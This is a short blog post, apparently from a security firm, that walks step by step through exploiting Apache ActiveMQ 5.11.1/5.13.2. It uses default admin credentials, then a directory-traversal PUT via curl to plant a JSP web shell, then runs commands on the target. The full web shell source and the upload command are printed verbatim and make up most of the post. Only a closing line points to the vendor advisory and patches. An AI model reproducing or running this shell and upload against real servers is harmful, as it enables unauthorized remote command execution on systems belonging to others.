Exploiting ActiveMQ 5.11.1/5.13.2 under 5 minutes with 5 steps (Directory Traversal / RCE)

Inveteck Global
2 min readSep 6, 2021

Today we are going to exploit an activeMQ running on port 8161 without Metasploit.

Apache ActiveMQ is an open source message broker written in Java together with a full Java Message Service client. It provides “Enterprise Features” which in this case means fostering the communication from more than one client or server.

Time to exploit:

We first of all visit the target domain on the specific port (8161)

activeMQ

Navigate to the /admin path

Authentication Required

By entering default credential, we are able to login to the portal. We create a file on our attacker machine as inveteck.jsp

$ cat inveteck.jsp<%@ page import="java.util.*,java.io.*"%>  
<%
%>
<HTML><BODY>
Commands with JSP
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="attack">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("attack") != null) {
out.println("Command: " + request.getParameter("attack") + "<BR>");
Process p = Runtime.getRuntime().exec(request.getParameter("attack"));
OutputStream os = p.getOutputStream();
InputStream in = p.getInputStream();
DataInputStream dis = new DataInputStream(in);
String disr = dis.readLine();
while ( disr != null ) {
out.println(disr);
disr = dis.readLine();
}
}
%>
</pre>
</BODY></HTML>
inveteck.jsp

run a curl command to put(upload) the created inveteck.jsp to the server:

curl -u ‘username:password’ -v -X PUT -data “@inveteck.jsp” http://TARGET:8161/fileserver/..\\admin\\inveteck.jsp

uploading inveteck.jsp to server

Capture request in burp suite, send it over to repeater and try to run ipconfig to check the ip address of our target

ip address check on target

Recommendation: The ActiveMQ project has released an advisory and patches.

www.inveteckglobal.com

credit: DAVID JORM

--

--